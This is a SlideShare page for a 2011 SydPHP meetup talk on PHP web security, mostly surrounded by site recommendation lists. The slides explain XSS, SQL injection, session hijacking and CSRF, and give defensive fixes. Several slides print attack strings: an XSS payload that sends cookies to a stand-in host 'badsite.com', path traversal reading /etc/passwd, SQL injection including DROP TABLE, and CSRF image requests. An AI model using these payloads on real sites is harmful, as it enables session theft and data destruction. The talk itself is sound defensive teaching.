Submit Search
Upload
SydPHP Security in PHP
•
Download as PPTX, PDF
•
3 likes
•
2,086 views
Allan Shone
Follow
Security in PHP talk for SydPHP, Thursday 24th February, 2011
Read less
Read more
Technology
Report
Share
Report
Share
1 of 39
Download now
Recommended
The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about it
Francois Marier
obtain additional security
obtain additional security
offbeatnominee633
Common hacking practices
Common hacking practices
Marian Marinov
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small Businesses
PECB
B-sides Las Vegas - social network security
B-sides Las Vegas - social network security
Damon Cortesi
Facebook Password Sniper
Facebook Password Sniper
eagerdemography62
Death To Passwords
Death To Passwords
DroidConTLV
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
Recommended
The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about it
Francois Marier
obtain additional security
obtain additional security
offbeatnominee633
Common hacking practices
Common hacking practices
Marian Marinov
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small Businesses
PECB
B-sides Las Vegas - social network security
B-sides Las Vegas - social network security
Damon Cortesi
Facebook Password Sniper
Facebook Password Sniper
eagerdemography62
Death To Passwords
Death To Passwords
DroidConTLV
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
Death To Passwords Droid Edition
Death To Passwords Droid Edition
PayPal
Death To Passwords
Death To Passwords
Tim Messerschmidt
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
Catarina Cardoso
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
Pantheon
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Pietro Polsinelli
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
Hacking 101 (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
Web application vulnerabilities
Web application vulnerabilities
ebusinessmantra
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
Sophos Benelux
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
Jeremiah Grossman
Hacking 101 3
Hacking 101 3
Nitroxis Sprl
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
Anna Völkl
Delete fb downloader search
Delete fb downloader search
christaldisouza1
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
Anna Völkl
CSS3 and jQuery
CSS3 and jQuery
psophy
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
Constantin Titarenko
PHP Security Tips
PHP Security Tips
Chris Tankersley
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Chris Tankersley
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
pauljadam
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Aditya K Sood
More Related Content
What's hot
Death To Passwords Droid Edition
Death To Passwords Droid Edition
PayPal
Death To Passwords
Death To Passwords
Tim Messerschmidt
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
Catarina Cardoso
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
Pantheon
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Pietro Polsinelli
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
Hacking 101 (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
Web application vulnerabilities
Web application vulnerabilities
ebusinessmantra
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
Sophos Benelux
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
Jeremiah Grossman
Hacking 101 3
Hacking 101 3
Nitroxis Sprl
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
Anna Völkl
Delete fb downloader search
Delete fb downloader search
christaldisouza1
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
Anna Völkl
What's hot
(16)
Death To Passwords Droid Edition
Death To Passwords Droid Edition
Death To Passwords
Death To Passwords
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
Hacking 101 (Session 2)
Hacking 101 (Session 2)
Web application vulnerabilities
Web application vulnerabilities
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
Hacking 101 3
Hacking 101 3
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
Delete fb downloader search
Delete fb downloader search
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
Viewers also liked
CSS3 and jQuery
CSS3 and jQuery
psophy
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
Constantin Titarenko
PHP Security Tips
PHP Security Tips
Chris Tankersley
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Chris Tankersley
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
pauljadam
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Aditya K Sood
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)
Jerry Ocampo
Cinematic UX Design
Cinematic UX Design
Dave Kelleher
jQuery Plugins Intro
jQuery Plugins Intro
Casey West
Cross platform php
Cross platform php
Elizabeth Smith
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languages
PostgreSQL Experts, Inc.
LAMP Management with Virtualmin
LAMP Management with Virtualmin
Joe Ferguson
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
Information Technology
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
webhostingguy
Effective communication
Effective communication
hussulinux
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery Primer
Matthew Buchanan
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
Joe Ferguson
Apache Web Server Setup 2
Apache Web Server Setup 2
Information Technology
Using unicode with php
Using unicode with php
Elizabeth Smith
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Giuseppe Paterno'
Viewers also liked
(20)
CSS3 and jQuery
CSS3 and jQuery
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
PHP Security Tips
PHP Security Tips
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)
Cinematic UX Design
Cinematic UX Design
jQuery Plugins Intro
jQuery Plugins Intro
Cross platform php
Cross platform php
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languages
LAMP Management with Virtualmin
LAMP Management with Virtualmin
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
Effective communication
Effective communication
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery Primer
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
Apache Web Server Setup 2
Apache Web Server Setup 2
Using unicode with php
Using unicode with php
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Similar to SydPHP Security in PHP
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
Securing Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
Building Web Hack Interfaces
Building Web Hack Interfaces
Christian Heilmann
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
Web Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
gbud7
Starwest 2008
Starwest 2008
Caleb Sima
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
Abbas Naderi
Security Tech Talk
Security Tech Talk
Mallikarjun Reddy
PHPUG Presentation
PHPUG Presentation
Damon Cortesi
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must Have
IndumathySK
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Joann Davis
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers Presentation
Seo Indonesia
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
ufpb
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
Ricardo Varela
Web API Security
Web API Security
Stefaan
Web Application Security
Web Application Security
Siarhei Barysiuk
Worry Free Web Development
Worry Free Web Development
Ara Pehlivanian
Similar to SydPHP Security in PHP
(20)
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Securing Java EE Web Apps
Securing Java EE Web Apps
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Building Web Hack Interfaces
Building Web Hack Interfaces
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Web Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
Starwest 2008
Starwest 2008
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
Security Tech Talk
Security Tech Talk
PHPUG Presentation
PHPUG Presentation
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must Have
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers Presentation
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
Web API Security
Web API Security
Web Application Security
Web Application Security
Worry Free Web Development
Worry Free Web Development
Recently uploaded
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
Sinan KOZAK
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
The Digital Insurer
Slack Application Development 101 Slides
Slack Application Development 101 Slides
praypatel2
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
V3cube
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
wesley chun
How to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
naman860154
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Martijn de Jong
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
The Digital Insurer
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Paola De la Torre
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j
Recently uploaded
(20)
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
Slack Application Development 101 Slides
Slack Application Development 101 Slides
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
How to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
SydPHP Security in PHP
1.
Security and PHP
February 2011
2.
Allan Shone Technical
Yahoo!, Local Paranoid @Yahoo!7 Been at Yahoo!7 just under 3 years allan.shone@yahoo.com
3.
Website Security February
2011
4.
What is Security?
Why is Security important? What can you do about it?
5.
Types of issues
XSS SQL Injection Session Hijacking CSRF Phishing
6.
Why XSS? February
2011
7.
Lead to larger
problems Used to inject code into your site Bad people ™ can steal user information
8.
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
February 2011
9.
February 2011
10.
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00 http://sydphp.leetbix.com/template.php?load=../some-config.conf%00 February
2011
11.
POST too February
2011
12.
What do I
do?! February 2011
13.
Filter Simplest solution:
htmlentities() February 2011
14.
SQL what? February
2011
15.
Arbitrary SQL code
being executed Bypass login, edit database content Find passwords, hidden information
16.
http://sydphp.leetbix.com/login.php Password: ‘
OR 1=1 -- ‘ ‘ OR 1=1; DROP TABLE users; -- ‘ ‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘ February 2011
17.
Oh no! February
2011
18.
http://xkcd.com/327/ February 2011
19.
escape February 2011
20.
mysql_real_escape_string() addslashes() PDO
PDO::quote()
21.
Session hijacking February
2011
22.
Bad for users
Bad for data integrity Easy to prevent
23.
Not stand-alone February
2011
24.
Cookies February 2011
25.
Integrity checking February
2011
26.
CSRF? Sugar? February
2011
27.
Cross-site request forgery
February 2011
28.
Simple, but un-common
February 2011
29.
<imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /> <script>
a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a); a.src=‘http://badsite.com/otherpage’; </script> February 2011
30.
Integrity, integrity February
2011
31.
Phishing! February 2011
32.
Same, but different?
February 2011
33.
But what can
you do February 2011
34.
PHP’s filter functions
February 2011
35.
filter_has_var filter_id filter_input_array
filter_input filter_list filter_var_array filter_var
36.
No more SuperGlobals
February 2011
37.
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
echo ”<h3>No results found for ‘{$search}’.</h3>"; echo "<a href='?search=$search&page=2'>Next page</a>"; February 2011
38.
INPUT_GET INPUT_POST INPUT_COOKIE
INPUT_SERVER INPUT_ENV February 2011
39.
Twitter Allan
Shone - @cerealboy Jared Mooring - @jadzor Filter function filters: http://au2.php.net/manual/en/filter.filters.php February 2011
Download now